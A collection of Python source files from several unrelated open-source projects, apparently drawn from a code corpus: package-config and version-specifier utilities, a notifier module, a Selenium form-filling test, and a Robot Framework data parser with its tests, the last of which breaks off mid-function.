#### File: test/unit/test_pkg_config.py
```python
from io import StringIO
from unittest import TestCase
from mopack.path import Path
from mopack.pkg_config import write_pkg_config
from mopack.shell import ShellArguments
class TestWritePkgConfig(TestCase):
def test_default(self):
out = StringIO()
write_pkg_config(out, 'mypackage')
self.assertRegex(
out.getvalue(),
'Name: mypackage\n' +
'Description: mopack-generated package\n' +
'Version: \n$'
)
def test_arguments(self):
out = StringIO()
write_pkg_config(out, 'mypackage', desc='my package', version='1.0',
cflags=ShellArguments(['-Ifoo']),
libs=ShellArguments(['-lbar']))
self.assertRegex(
out.getvalue(),
'Name: mypackage\n' +
'Description: my package\n' +
'Version: 1.0\n' +
'Cflags: -Ifoo\n' +
'Libs: -lbar\n$'
)
def test_variables(self):
out = StringIO()
write_pkg_config(
out, 'mypackage', desc='my package', version='1.0',
cflags=ShellArguments([('-I', Path('foo', 'srcdir'))]),
libs=ShellArguments([('-L', Path('', 'builddir')), '-lbar']),
variables={'srcdir': '/srcdir', 'builddir': '/builddir'}
)
self.assertRegex(
out.getvalue(),
'srcdir=/srcdir\n' +
'builddir=/builddir\n\n' +
'Name: mypackage\n' +
'Description: my package\n' +
'Version: 1.0\n' +
'Cflags: -I[\'"]\\${srcdir}[/\\\\]foo[\'"]\n' +
'Libs: -L[\'"]\\${builddir}[\'"] -lbar\n$'
)
def test_invalid(self):
out = StringIO()
with self.assertRaises(TypeError):
write_pkg_config(out, 'mypackage', variables={'srcdir': 1})
with self.assertRaises(TypeError):
write_pkg_config(out, 'mypackage', cflags=1)
``` |
{
"source": "jimporter/verspec",
"score": 3
} |
#### File: verspec/verspec/basespecifier.py
```python
import abc
from typing import (Callable, Dict, Iterable, Iterator, Optional, Pattern, Set,
Tuple, Union)
from .baseversion import BaseVersion, UnparsedVersion
CallableOperator = Callable[[BaseVersion, str], bool]
class InvalidSpecifier(ValueError):
"""
An invalid specifier was found, users should refer to PEP 440.
"""
class BaseSpecifier(metaclass=abc.ABCMeta):
@abc.abstractmethod
def __str__(self) -> str:
"""
Returns the str representation of this Specifier like object. This
should be representative of the Specifier itself.
"""
@abc.abstractmethod
def __hash__(self) -> int:
"""
Returns a hash value for this Specifier like object.
"""
@abc.abstractmethod
def __eq__(self, other: object) -> bool:
"""
Returns a boolean representing whether or not the two Specifier like
objects are equal.
"""
@abc.abstractmethod
def __ne__(self, other: object) -> bool:
"""
Returns a boolean representing whether or not the two Specifier like
objects are not equal.
"""
@abc.abstractproperty
def prereleases(self) -> Optional[bool]:
"""
Returns whether or not pre-releases as a whole are allowed by this
specifier.
"""
@prereleases.setter
def prereleases(self, value: bool) -> None:
"""
Sets whether or not pre-releases as a whole are allowed by this
specifier.
"""
@abc.abstractmethod
def contains(self, item: UnparsedVersion,
prereleases: Optional[bool] = None) -> bool:
"""
Determines if the given item is contained within this specifier.
"""
@abc.abstractmethod
def filter(
self, iterable: Iterable[UnparsedVersion],
prereleases: Optional[bool] = None,
) -> Iterable[UnparsedVersion]:
"""
Takes an iterable of items and filters them so that only items which
are contained within this specifier are allowed in it.
"""
class IndividualSpecifier(BaseSpecifier, metaclass=abc.ABCMeta):
_operators: Dict[str, str] = {}
_regex = None # type: Pattern
def __init__(self, spec: str = "",
prereleases: Optional[bool] = None) -> None:
match = self._regex.search(spec)
if not match:
raise InvalidSpecifier("Invalid specifier: '{0}'".format(spec))
self._spec: Tuple[str, str] = (
match.group("operator").strip(),
match.group("version").strip(),
)
# Store whether or not this Specifier should accept prereleases
self._prereleases = prereleases
@abc.abstractmethod
def _coerce_version(self, version: UnparsedVersion) -> BaseVersion:
pass
@property
@abc.abstractmethod
def _canonical_spec(self) -> Tuple[str, UnparsedVersion]:
pass
def __repr__(self) -> str:
pre = (
", prereleases={0!r}".format(self.prereleases)
if self._prereleases is not None
else ""
)
return "<{0}({1!r}{2})>".format(type(self).__name__, str(self), pre)
def __str__(self) -> str:
return "{0}{1}".format(*self._spec)
def __hash__(self) -> int:
return hash(self._canonical_spec)
def __eq__(self, other: object) -> bool:
if isinstance(other, str):
try:
other = type(self)(str(other))
except InvalidSpecifier:
return NotImplemented
elif not isinstance(other, type(self)):
return NotImplemented
return self._canonical_spec == other._canonical_spec
def __ne__(self, other: object) -> bool:
if isinstance(other, str):
try:
other = type(self)(str(other))
except InvalidSpecifier:
return NotImplemented
elif not isinstance(other, type(self)):
return NotImplemented
return self._canonical_spec != other._canonical_spec
def _get_operator(self, op: str) -> CallableOperator:
operator_callable: CallableOperator = getattr(
self, "_compare_{0}".format(self._operators[op])
)
return operator_callable
@property
def operator(self) -> str:
return self._spec[0]
@property
def version(self) -> str:
return self._spec[1]
@property
def prereleases(self) -> Optional[bool]:
return self._prereleases
@prereleases.setter
def prereleases(self, value: bool) -> None:
self._prereleases = value
def __contains__(self, item: UnparsedVersion) -> bool:
return self.contains(item)
def contains(self, item: UnparsedVersion,
prereleases: Optional[bool] = None) -> bool:
# Determine if prereleases are to be allowed or not.
if prereleases is None:
prereleases = self.prereleases
# Normalize item to a Version or LooseVersion, this allows us to have
# a shortcut for ``"2.0" in Specifier(">=2")
normalized_item = self._coerce_version(item)
# Determine if we should be supporting prereleases in this specifier
# or not, if we do not support prereleases than we can short circuit
# logic if this version is a prereleases.
if normalized_item.is_prerelease and not prereleases:
return False
# Actually do the comparison to determine if this item is contained
# within this Specifier or not.
operator_callable = self._get_operator(self.operator)
return operator_callable(normalized_item, self.version)
def filter(
self, iterable: Iterable[UnparsedVersion],
prereleases: Optional[bool] = None,
) -> Iterable[UnparsedVersion]:
yielded = False
found_prereleases = []
kw = {"prereleases": prereleases if prereleases is not None else True}
# Attempt to iterate over all the values in the iterable and if any of
# them match, yield them.
for version in iterable:
parsed_version = self._coerce_version(version)
if self.contains(parsed_version, **kw):
# If our version is a prerelease, and we were not set to allow
# prereleases, then we'll store it for later incase nothing
# else matches this specifier.
if parsed_version.is_prerelease and not (
prereleases or self.prereleases
):
found_prereleases.append(version)
# Either this is not a prerelease, or we should have been
# accepting prereleases from the beginning.
else:
yielded = True
yield version
# Now that we've iterated over everything, determine if we've yielded
# any values, and if we have not and we have any prereleases stored up
# then we will go ahead and yield the prereleases.
if not yielded and found_prereleases:
for version in found_prereleases:
yield version
class BaseSpecifierSet(BaseSpecifier, metaclass=abc.ABCMeta):
def __init__(self, parsed_specifiers: Set[BaseSpecifier],
prereleases: Optional[bool]) -> None:
# Turn our parsed specifiers into a frozen set and save them for later.
self._specs = frozenset(parsed_specifiers)
# Store our prereleases value so we can use it later to determine if
# we accept prereleases or not.
self._prereleases = prereleases
@abc.abstractmethod
def _coerce_version(self, version: UnparsedVersion) -> BaseVersion:
pass
@abc.abstractmethod
def _filter_prereleases(
self, iterable: Iterable[UnparsedVersion],
prereleases: Optional[bool]
) -> Iterable[UnparsedVersion]:
pass
def __repr__(self) -> str:
pre = (
", prereleases={0!r}".format(self.prereleases)
if self._prereleases is not None
else ""
)
return "<{0}({1!r}{2})>".format(type(self).__name__, str(self), pre)
def __str__(self) -> str:
return ",".join(sorted(str(s) for s in self._specs))
def __hash__(self) -> int:
return hash(self._specs)
def __and__(
self, other: Union["BaseSpecifierSet", str],
) -> "BaseSpecifierSet":
if isinstance(other, str):
other = type(self)(other) # type: ignore
elif not isinstance(other, type(self)):
# Currently, SpecifierSets and LooseSpecifierSets can't be
# combined.
return NotImplemented
specifier = type(self)() # type: ignore
specifier._specs = frozenset(self._specs | other._specs)
if self._prereleases is None and other._prereleases is not None:
specifier._prereleases = other._prereleases
elif self._prereleases is not None and other._prereleases is None:
specifier._prereleases = self._prereleases
elif self._prereleases == other._prereleases:
specifier._prereleases = self._prereleases
else:
raise ValueError(
"Cannot combine {}s with True and False prerelease "
"overrides.".format(type(self).__name__)
)
return specifier
def __eq__(self, other: object) -> bool:
if isinstance(other, (str, IndividualSpecifier)):
other = type(self)(str(other)) # type: ignore
elif not isinstance(other, BaseSpecifierSet):
return NotImplemented
return self._specs == other._specs
def __ne__(self, other: object) -> bool:
if isinstance(other, (str, IndividualSpecifier)):
other = type(self)(str(other)) # type: ignore
elif not isinstance(other, BaseSpecifierSet):
return NotImplemented
return self._specs != other._specs
def __len__(self) -> int:
return len(self._specs)
def __iter__(self) -> Iterator[BaseSpecifier]:
return iter(self._specs)
@property
def prereleases(self) -> Optional[bool]:
# If we have been given an explicit prerelease modifier, then we'll
# pass that through here.
if self._prereleases is not None:
return self._prereleases
# If we don't have any specifiers, and we don't have a forced value,
# then we'll just return None since we don't know if this should have
# pre-releases or not.
if not self._specs:
return None
# Otherwise we'll see if any of the given specifiers accept
# prereleases, if any of them do we'll return True, otherwise False.
return any(s.prereleases for s in self._specs)
@prereleases.setter
def prereleases(self, value: bool) -> None:
self._prereleases = value
def __contains__(self, item: UnparsedVersion) -> bool:
return self.contains(item)
def contains(self, item: UnparsedVersion,
prereleases: Optional[bool] = None) -> bool:
# Ensure that our item is a PythonVersion or LooseVersion instance.
parsed_item = self._coerce_version(item)
# Determine if we're forcing a prerelease or not, if we're not forcing
# one for this particular filter call, then we'll use whatever the
# SpecifierSet thinks for whether or not we should support prereleases.
if prereleases is None:
prereleases = self.prereleases
# We can determine if we're going to allow pre-releases by looking to
# see if any of the underlying items supports them. If none of them do
# and this item is a pre-release then we do not allow it and we can
# short circuit that here.
# Note: This means that 1.0.dev1 would not be contained in something
# like >=1.0.devabc however it would be in >=1.0.debabc,>0.0.dev0
if not prereleases and parsed_item.is_prerelease:
return False
# We simply dispatch to the underlying specs here to make sure that the
# given version is contained within all of them.
# Note: This use of all() here means that an empty set of specifiers
# will always return True, this is an explicit design decision.
return all(
s.contains(parsed_item, prereleases=prereleases)
for s in self._specs
)
def filter(
self, iterable: Iterable[UnparsedVersion],
prereleases: Optional[bool] = None,
) -> Iterable[UnparsedVersion]:
# Determine if we're forcing a prerelease or not, if we're not forcing
# one for this particular filter call, then we'll use whatever the
# SpecifierSet thinks for whether or not we should support prereleases.
if prereleases is None:
prereleases = self.prereleases
# If we have any specifiers, then we want to wrap our iterable in the
# filter method for each one, this will act as a logical AND amongst
# each specifier.
if self._specs:
for spec in self._specs:
iterable = spec.filter(iterable, prereleases=bool(prereleases))
return iterable
# If we do not have any specifiers, then we need to have a rough filter
# which will filter out any pre-releases, unless there are no final
# releases, and which will filter out LooseVersion in general.
else:
return self._filter_prereleases(iterable, prereleases)
```
#### File: verspec/verspec/loose.py
```python
import re
from typing import Iterator, List, Tuple
from .baseversion import *
from .basespecifier import *
__all__ = ["InvalidVersion", "InvalidSpecifier", "LooseSpecifier",
"LooseSpecifierSet", "LooseVersion"]
LooseCmpKey = Tuple[str, ...]
class LooseVersion(BaseVersion):
def __init__(self, version: str) -> None:
self._version = str(version)
self._key = _loose_cmpkey(self._version)
def __str__(self) -> str:
return self._version
@property
def public(self) -> str:
return self._version
@property
def base_version(self) -> str:
return self._version
@property
def epoch(self) -> int:
return 0
@property
def release(self) -> None:
return None
@property
def pre(self) -> None:
return None
@property
def post(self) -> None:
return None
@property
def dev(self) -> None:
return None
@property
def local(self) -> None:
return None
@property
def is_prerelease(self) -> bool:
return False
@property
def is_postrelease(self) -> bool:
return False
@property
def is_devrelease(self) -> bool:
return False
_loose_version_component_re = re.compile(r"(\d+ | [a-z]+ | \.| -)", re.VERBOSE)
_loose_version_replacement_map = {
"pre": "c",
"preview": "c",
"-": "final-",
"rc": "c",
"dev": "@",
}
def _parse_version_parts(s: str) -> Iterator[str]:
for part in _loose_version_component_re.split(s):
part = _loose_version_replacement_map.get(part, part)
if not part or part == ".":
continue
if part[:1] in "0123456789":
# pad for numeric comparison
yield part.zfill(8)
else:
yield "*" + part
# ensure that alpha/beta/candidate are before final
yield "*final"
def _loose_cmpkey(version: str) -> LooseCmpKey:
# This scheme is taken from pkg_resources.parse_version setuptools prior to
# it's adoption of the packaging library.
parts: List[str] = []
for part in _parse_version_parts(version.lower()):
if part.startswith("*"):
# remove "-" before a prerelease tag
if part < "*final":
while parts and parts[-1] == "*final-":
parts.pop()
# remove trailing zeros from each series of numeric parts
while parts and parts[-1] == "00000000":
parts.pop()
parts.append(part)
return tuple(parts)
class LooseSpecifier(IndividualSpecifier):
_regex_str = r"""
(?P<operator>(==|!=|<=|>=|<|>))
\s*
(?P<version>
[^,;\s)]* # Since this is a "loose" specifier, and the version
# string can be just about anything, we match everything
# except for whitespace, a semi-colon for marker support,
# a closing paren since versions can be enclosed in
# them, and a comma since it's a version separator.
)
"""
_regex = re.compile(r"^\s*" + _regex_str + r"\s*$",
re.VERBOSE | re.IGNORECASE)
_operators = {
"==": "equal",
"!=": "not_equal",
"<=": "less_than_equal",
">=": "greater_than_equal",
"<": "less_than",
">": "greater_than",
}
def _coerce_version(self, version: UnparsedVersion) -> LooseVersion:
if not isinstance(version, LooseVersion):
version = LooseVersion(str(version))
return version
@property
def _canonical_spec(self) -> Tuple[str, str]:
return self._spec
def _compare_equal(self, prospective: LooseVersion, spec: str) -> bool:
return prospective == self._coerce_version(spec)
def _compare_not_equal(self, prospective: LooseVersion, spec: str) -> bool:
return prospective != self._coerce_version(spec)
def _compare_less_than_equal(self, prospective: LooseVersion,
spec: str) -> bool:
return prospective <= self._coerce_version(spec)
def _compare_greater_than_equal(self, prospective: LooseVersion,
spec: str) -> bool:
return prospective >= self._coerce_version(spec)
def _compare_less_than(self, prospective: LooseVersion, spec: str) -> bool:
return prospective < self._coerce_version(spec)
def _compare_greater_than(self, prospective: LooseVersion,
spec: str) -> bool:
return prospective > self._coerce_version(spec)
class LooseSpecifierSet(BaseSpecifierSet):
def __init__(self, specifiers: str = "") -> None:
# Split on , to break each individual specifier into its own item, and
# strip each item to remove leading/trailing whitespace.
split_specifiers = [s.strip() for s in specifiers.split(",")
if s.strip()]
# Parse each individual specifier as a LooseSpecifier.
parsed: Set[BaseSpecifier] = set(LooseSpecifier(specifier)
for specifier in split_specifiers)
super().__init__(parsed, None)
def _coerce_version(self, version: UnparsedVersion) -> LooseVersion:
if not isinstance(version, LooseVersion):
version = LooseVersion(str(version))
return version
def _filter_prereleases(
self, iterable: Iterable[UnparsedVersion],
prereleases: Optional[bool]
) -> Iterable[UnparsedVersion]:
# Note: We ignore prereleases, since LooseVersions are never
# prereleases, and only have that field for compatibility.
return iterable
Version = LooseVersion
Specifier = LooseSpecifier
SpecifierSet = LooseSpecifierSet
``` |
{
"source": "jimporter/watcher",
"score": 3
} |
#### File: watcher/watcher/notifiers.py
```python
import smtplib
from email.mime import MimeText
class Notifiers:
def __init__(self):
self._default = None
self._notifiers = {}
def add(self, name, kind, default=False, **kwargs):
notifier = _known_notifiers[kind](**kwargs)
self._notifiers[name] = notifier
if default:
if self._default:
raise TypeError('default already set')
self._default = notifier
@property
def default(self):
if self._default is None:
raise TypeError('no default set')
return self._default
def __getitem__(self, key):
return self._notifiers[key]
class ConsoleNotifier:
def notify(self, eq):
print('New stuff: {}'.format(eq.added))
class EmailNotifier:
def __init__(self, server, username, password, to_addr, from_addr=None):
server, port = server.split(':')
self.server = server
self.port = int(port)
self.username = username
self.password = password
self.from_addr = from_addr or username
self.to_addr = to_addr
def notify(self, eq):
server = smtplib.SMTP(self.server, self.port)
server.starttls()
server.login(self.username, self.password)
msg = MimeText('New stuff: {}'.format(eq.added))
msg['From'] = self.from_addr
msg['To'] = self.to_addr
server.send_message(msg)
server.quit()
_known_notifiers = {
'console': ConsoleNotifier,
'email': EmailNotifier,
}
``` |
{
"source": "jimpriest/presentations",
"score": 3
} |
#### File: tacfug-webdriver-2015/google/google-form4.py
```python
import unittest, os, random, datetime
from selenium import webdriver
from datetime import datetime
from vars import ( phantomjs_path, url )
from selenium.webdriver.support.ui import Select
color_list = ['Blue', 'Red', 'Green', 'Yellow']
random_color = random.choice(color_list)
name_list = ['<NAME>', '<NAME>', '<NAME>', '<NAME>']
random_name = random.choice(name_list)
current_year = datetime.now().strftime('%Y')
random_year = random.choice(range(1892, int(current_year) ))
email_list = ['<EMAIL>', '<EMAIL>', '<EMAIL>', '<EMAIL>']
random_email = random.choice(email_list)
class GoogleForm(unittest.TestCase):
def setUp(self):
print 'lets leverage python and add some randomness!\ncheckout random.png'
print random_email
self.driver = webdriver.PhantomJS(executable_path=phantomjs_path, service_log_path=os.path.devnull)
self.driver.set_window_size(1024, 768)
self.driver.get(url)
def test_google_form(self):
driver = self.driver
driver.find_element_by_id("entry_510407236").send_keys("{0}".format(random_name))
Select(driver.find_element_by_id("entry.462822380_month")).select_by_visible_text("January")
Select(driver.find_element_by_id("entry.462822380_day")).select_by_visible_text("1")
Select(driver.find_element_by_id("entry.462822380_year")).select_by_visible_text("{}".format(random_year))
Select(driver.find_element_by_id("entry_768625966")).select_by_visible_text("{0}".format(random_color))
driver.find_element_by_id("entry_888074637").send_keys("{0}".format(random_email))
self.driver.save_screenshot('random.png')
driver.find_element_by_id("ss-submit").click()
def tearDown(self):
# lets add some validation / error checking
try:
self.assertTrue(("Your response has been recorded" in self.driver.find_element_by_tag_name("html").text), "Could not find verification message.")
print "Test passed!"
except AssertionError as e:
print("Test failed: Could not find verification text.")
self.driver.quit()
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jimpriest/sublime-robot-framework-assistant",
"score": 3
} |
#### File: command_helper/utils/util.py
```python
import re
from json import load as json_load
def get_data_from_json(json_file):
f = open(json_file)
data = json_load(f)
f.close()
return data
def _keyword_with_embedded_arg(kw, kw_candite):
kw = kw.lower().replace(' ', '').replace('_', '')
kw_candite = kw_candite.lower().replace(' ', '').replace('_', '')
kw_re = re.sub(r'(?i)(\$\{[\w ]*\})', r'(?i)(\S+)', kw_candite)
return re.search(kw_re, kw)
def _keyword_no_embedded_arg(kw, kw_candite):
kw = kw.lower().replace(' ', '').replace('_', '')
kw_candite = kw_candite.lower().replace(' ', '').replace('_', '')
kw_candite = kw_candite.lstrip('.')
return kw == kw_candite
def kw_equals_kw_candite(kw, kw_candite):
"""Returns True if kw == kw_canditate
Spaces, under score are removed and
strings are converted to lower before validation.
Also support keyword conditate with emedded args
"""
if '$' in kw_candite:
return _keyword_with_embedded_arg(kw, kw_candite)
else:
return _keyword_no_embedded_arg(kw, kw_candite)
```
#### File: dataparser/data_parser/data_parser.py
```python
from robot import parsing
from robot.variables.filesetter import VariableFileSetter
from robot.variables.store import VariableStore
from robot.variables.variables import Variables
from robot.libdocpkg.robotbuilder import LibraryDocBuilder
from robot.utils.importer import Importer
from robot.libraries import STDLIBS
from robot.output import LOGGER as ROBOT_LOGGER
from robot.errors import DataError
from os import path
import xml.etree.ElementTree as ET
from tempfile import mkdtemp
import logging
import inspect
from parser_utils.util import normalise_path
from db_json_settings import DBJsonSetting
logging.basicConfig(
format='%(levelname)s:%(asctime)s: %(message)s',
level=logging.DEBUG)
def strip_and_lower(text):
return text.lower().replace(' ', '_')
class DataParser():
""" This class is used to parse different tables in test data.
Class will return the the test data as in json format. Can parse
Python libraries, library xml documentation generated by the libdoc
resource and test suite files.
"""
def __init__(self):
self.file_path = None
self.rf_variables = Variables()
self.rf_var_storage = VariableStore(self.rf_variables)
self.libdoc = LibraryDocBuilder()
def parse_resource(self, file_path):
self.file_path = file_path
if path.exists(file_path):
if '__init__.' in file_path:
folder = path.dirname(file_path)
model = parsing.TestDataDirectory(source=folder).populate()
else:
model = parsing.ResourceFile(file_path).populate()
return self._parse_robot_data(file_path, model)
else:
logging.error('File %s could not be found', file_path)
raise ValueError(
'File does not exist: {0}'.format(file_path))
def parse_suite(self, file_path):
self.file_path = file_path
if path.exists(file_path):
model = parsing.TestCaseFile(source=file_path).populate()
return self._parse_robot_data(file_path, model)
else:
logging.error('File %s could not be found', file_path)
raise ValueError(
'File does not exist: {0}'.format(file_path))
def parse_variable_file(self, file_path, args=None):
if not args:
args = []
data = {}
data[DBJsonSetting.file_name] = path.basename(file_path)
data[DBJsonSetting.file_path] = normalise_path(file_path)
self.file_path = file_path
setter = VariableFileSetter(self.rf_var_storage)
var_list = []
try:
variables = setter.set(file_path, args)
except DataError:
variables = []
for variable in variables:
var_list.append(variable[0])
data[DBJsonSetting.variables] = sorted(var_list)
return data
def parse_library(self, library, args=None):
"""Parses RF library to dictionary
Uses internally libdoc modules to parse the library.
Possible arguments to the library are provided in the
args parameter.
"""
data = {}
if not args:
data[DBJsonSetting.arguments] = []
else:
arg_list = []
for arg in args:
arg_list.append(arg)
data[DBJsonSetting.arguments] = arg_list
if path.isfile(library):
data[DBJsonSetting.file_path] = normalise_path(library)
if library.endswith('.xml'):
library_module, keywords = self._parse_xml_doc(library)
data[DBJsonSetting.keywords] = keywords
data[DBJsonSetting.library_module] = library_module
elif library.endswith('.py'):
data[DBJsonSetting.file_name] = path.basename(library)
data[DBJsonSetting.library_module] = path.splitext(
data[DBJsonSetting.file_name])[0]
data[DBJsonSetting.keywords] = self._parse_python_lib(
library, data[DBJsonSetting.arguments])
else:
raise ValueError('Unknown library')
else:
data[DBJsonSetting.library_module] = library
data[DBJsonSetting.keywords] = self._parse_python_lib(
library, data[DBJsonSetting.arguments])
if data[DBJsonSetting.keywords] is None:
raise ValueError('Library did not contain keywords')
else:
return data
def register_console_logger(self):
ROBOT_LOGGER.register_console_logger()
def unregister_console_logger(self):
ROBOT_LOGGER.unregister_console_logger()
def close_logger(self):
ROBOT_LOGGER.close()
def _parse_python_lib(self, library, args):
lib_with_args = self._lib_arg_formatter(library, args)
kws = {}
try:
lib = self.libdoc.build(lib_with_args)
except DataError:
raise ValueError(
'Library does not exist: {0}'.format(library))
if library in STDLIBS:
import_name = 'robot.libraries.' + library
else:
import_name = library
importer = Importer('test library')
libcode = importer.import_class_or_module(
import_name, return_source=False)
kw_with_deco = self._get_keywords_with_robot_name(libcode)
for keyword in lib.keywords:
kw = {}
kw[DBJsonSetting.keyword_name] = keyword.name
kw[DBJsonSetting.tags] = list(keyword.tags._tags)
kw[DBJsonSetting.keyword_arguments] = keyword.args
kw[DBJsonSetting.documentation] = keyword.doc
if keyword.name in kw_with_deco:
function_name = kw_with_deco[keyword.name]
else:
function_name = keyword.name
kw[DBJsonSetting.keyword_file] = self._get_library_kw_source(
libcode, function_name)
kws[strip_and_lower(keyword.name)] = kw
return kws
def _get_keywords_with_robot_name(self, libcode):
"""Returns keywords which uses Robot keyword decorator with robot_name
The keyword name can be chaned with Robot Framework keyword decorator
and by using the robot_name attribute. Return dictinionary which key is
the value of the robot_name attribute and the orinal function name.
"""
kw_deco = {}
for key in libcode.__dict__:
if callable(libcode.__dict__[key]):
try:
if 'robot_name' in libcode.__dict__[key].__dict__:
kw = libcode.__dict__[key].__dict__['robot_name']
kw_deco[kw] = key
except AttributeError:
pass
return kw_deco
def _get_library_kw_source(self, libcode, keyword):
kw_func = keyword.lower().replace(' ', '_')
func = None
func_file = None
if hasattr(libcode, kw_func):
func = getattr(libcode, kw_func)
if func:
kw_class = self.get_class_that_defined_method(func)
if kw_class:
func_file = self.get_function_file(kw_class)
else:
func_file = self.get_function_file(func)
return func_file
def get_class_that_defined_method(self, meth):
try:
class_mro = inspect.getmro(meth.im_class)
except AttributeError:
return None
for cls in class_mro:
if meth.__name__ in cls.__dict__:
return cls
return None
def get_function_file(self, kw_class):
file_ = inspect.getsourcefile(kw_class)
if file_ and path.exists(file_):
return normalise_path(file_)
else:
return None
def _lib_arg_formatter(self, library, args):
args = self._argument_path_formatter(library, args)
if not args:
return library
else:
for item in args:
library = '{lib}::{item}'.format(lib=library, item=item)
return library
def _argument_path_formatter(self, library, args):
"""Replace robot folder with real path
If ${/}, ${OUTPUT_DIR} or ${EXECDIR} is found from args then
a temporary directory is created and that one is used instead."""
arguments = []
for arg in args:
if '${/}' in arg or '${OUTPUT_DIR}' in arg or '${EXECDIR}' in arg:
f = mkdtemp()
logging.info(
'Possible robot path encountered in library arguments')
logging.debug('In library %s', library)
logging.debug('Instead of %s using: %s', arg, f)
arguments.append(f)
else:
arguments.append(arg)
return arguments
def _parse_xml_doc(self, library):
root = ET.parse(library).getroot()
if ('type', DBJsonSetting.library) in root.items():
return root.attrib['name'], self._parse_xml_lib(root)
else:
raise ValueError('XML file is not library: {0}'.format(
root.attrib['name'])
)
def _parse_xml_lib(self, root):
kws = {}
for element in root.findall('kw'):
kw = {}
kw[DBJsonSetting.keyword_file] = None
kw[DBJsonSetting.keyword_name] = element.attrib['name']
kw[DBJsonSetting.documentation] = element.find('doc').text
tags = []
[tags.append(tag.text) for tag in element.findall('.//tags/tag')]
kw[DBJsonSetting.tags] = tags
arg = []
[arg.append(tag.text) for tag in element.findall('.//arguments/arg')]
kw[DBJsonSetting.keyword_arguments] = arg
kws[strip_and_lower(kw[DBJsonSetting.keyword_name])] = kw
return kws
def _parse_robot_data(self, file_path, model):
data = {}
data[DBJsonSetting.file_name] = path.basename(file_path)
data[DBJsonSetting.file_path] = normalise_path(file_path)
data[DBJsonSetting.keywords] = self._get_keywords(model)
data[DBJsonSetting.variables] = self._get_global_variables(model)
lib, res, v_files = self._get_imports(
model,
path.dirname(normalise_path(file_path)),
file_path
)
data[DBJsonSetting.resources] = res
data[DBJsonSetting.libraries] = lib
data[DBJsonSetting.variable_files] = v_files
return data
def _get_keywords(self, model):
kw_data = {}
for kw in model.keywords:
tmp = {}
tmp[DBJsonSetting.keyword_arguments] = kw.args.value
tmp[DBJsonSetting.documentation] = kw.doc.value
tmp[DBJsonSetting.tags] = kw.tags.value
tmp[DBJsonSetting.keyword_name] = kw.name
kw_data[strip_and_lower(kw.name)] = tmp
return kw_data
def _get_imports(self, model, file_dir, file_path):
lib = []
res = []
var_files = []
for setting in model.setting_table.imports:
if setting.type == 'Library':
lib.append(self._format_library(setting, file_dir))
elif setting.type == 'Resource':
res.append(self._format_resource(setting, file_path))
elif setting.type == 'Variables':
var_files.append(self._format_variable_file(setting))
return lib, res, var_files
def _format_library(self, setting, file_dir):
data = {}
lib_name = setting.name
if lib_name.endswith('.py') and not path.isfile(lib_name):
lib_path = path.abspath(path.join(file_dir, lib_name))
lib_name = path.basename(lib_path)
elif lib_name.endswith('.py') and path.isfile(lib_name):
lib_path = normalise_path(lib_name)
lib_name = path.basename(lib_name)
else:
lib_path = None
data[DBJsonSetting.library_name] = lib_name
data[DBJsonSetting.library_alias] = setting.alias
data[DBJsonSetting.library_arguments] = setting.args
data[DBJsonSetting.library_path] = lib_path
return data
def _format_resource(self, setting, file_path):
if path.isabs(setting.name):
return setting.name
else:
c_dir = path.dirname(self.file_path)
resource_path = normalise_path(path.join(c_dir, setting.name))
if not path.isfile(resource_path):
print ('Import failure on file: {0},'.format(file_path),
'could not locate: {0}'.format(setting.name))
return resource_path
def _format_variable_file(self, setting):
data = {}
v_path = normalise_path(path.join(
path.dirname(self.file_path), setting.name))
args = {}
args['variable_file_arguments'] = setting.args
data[v_path] = args
return data
def _get_global_variables(self, model):
var_data = []
for var in model.variable_table.variables:
if var:
var_data.append(var.name)
return var_data
```
#### File: test_data/suite_tree/LibraryWithReallyTooLongName.py
```python
from robot.api.deco import keyword
class LibraryWithReallyTooLongName(object):
def long_name_keyword(self, *args):
"""Documentation goes here"""
print args
def other_long_name_keyword(self, *args, **kwargs):
"""Other documentation goes here"""
print args, kwargs
@keyword(name='Other Name Here')
def not_name(self, arg):
"""def not_name kw name Other Name Here"""
print arg
@keyword(name='Other ${arg1} and ${arg2} Too')
def keyword_deco(self, arg1, arg2):
"""lib keyword with emmedded args"""
print arg1, arg2
```
#### File: test/unit/test_get_keyword_from_resource.py
```python
import unittest
import env
import shutil
from os import path, mkdir
from index_runner import index_all
from queue.scanner import Scanner
from parser_utils.file_formatter import rf_table_name
from get_keyword import GetKeyword
class TestGetKeywordFromResource(unittest.TestCase):
@classmethod
def setUpClass(cls):
db_base = path.join(
env.RESULTS_DIR,
'database_in_package_dir')
cls.db_dir = path.join(
db_base,
'db_dir'
)
cls.index_dir = path.join(
db_base,
'index_dir',
)
cls.suite_dir = path.join(
env.TEST_DATA_DIR,
'suite_tree'
)
if path.exists(db_base):
shutil.rmtree(db_base)
mkdir(db_base)
mkdir(cls.db_dir)
mkdir(cls.index_dir)
scanner = Scanner()
scanner.scan(
cls.suite_dir,
'robot',
cls.db_dir)
index_all(cls.db_dir, cls.index_dir)
cls.rf_ext = 'robot'
def setUp(self):
self._get_kw = GetKeyword(
table_dir=self.db_dir,
index_dir=self.index_dir,
open_tab=self.get_common_robot_path,
rf_extension=self.rf_ext
)
def test_return_file_and_patter(self):
kw = 'Common Keyword 2'
object_name = None
expected_path = path.normcase(self.get_common_robot_path)
regex, file_path = self._get_kw.return_file_and_patter(object_name, kw)
self.assertEqual(regex, self.get_common_keyword_2_regex)
self.assertEqual(file_path, expected_path)
object_name = 'common'
regex, file_path = self._get_kw.return_file_and_patter(object_name, kw)
self.assertEqual(regex, self.get_common_keyword_2_regex)
self.assertEqual(file_path, expected_path)
kw = 'common keyword 2'
regex, file_path = self._get_kw.return_file_and_patter(object_name, kw)
self.assertEqual(regex, self.get_common_keyword_2_regex)
self.assertEqual(file_path, expected_path)
kw = 'COMMON KEYWORD 2'
regex, file_path = self._get_kw.return_file_and_patter(object_name, kw)
self.assertEqual(regex, self.get_common_keyword_2_regex)
self.assertEqual(file_path, expected_path)
kw = 'Common_Keyword_2'
regex, file_path = self._get_kw.return_file_and_patter(object_name, kw)
self.assertEqual(regex, self.get_common_keyword_2_regex)
self.assertEqual(file_path, expected_path)
kw = 'CommonKeyword2'
regex, file_path = self._get_kw.return_file_and_patter(object_name, kw)
self.assertEqual(regex, self.get_common_keyword_2_regex)
self.assertEqual(file_path, expected_path)
def test_with_test_a_robot(self):
get_kw = GetKeyword(
table_dir=self.db_dir,
index_dir=self.index_dir,
open_tab=self.test_a_file,
rf_extension=self.rf_ext
)
kw = 'Resource A Keyword 1'
object_name = None
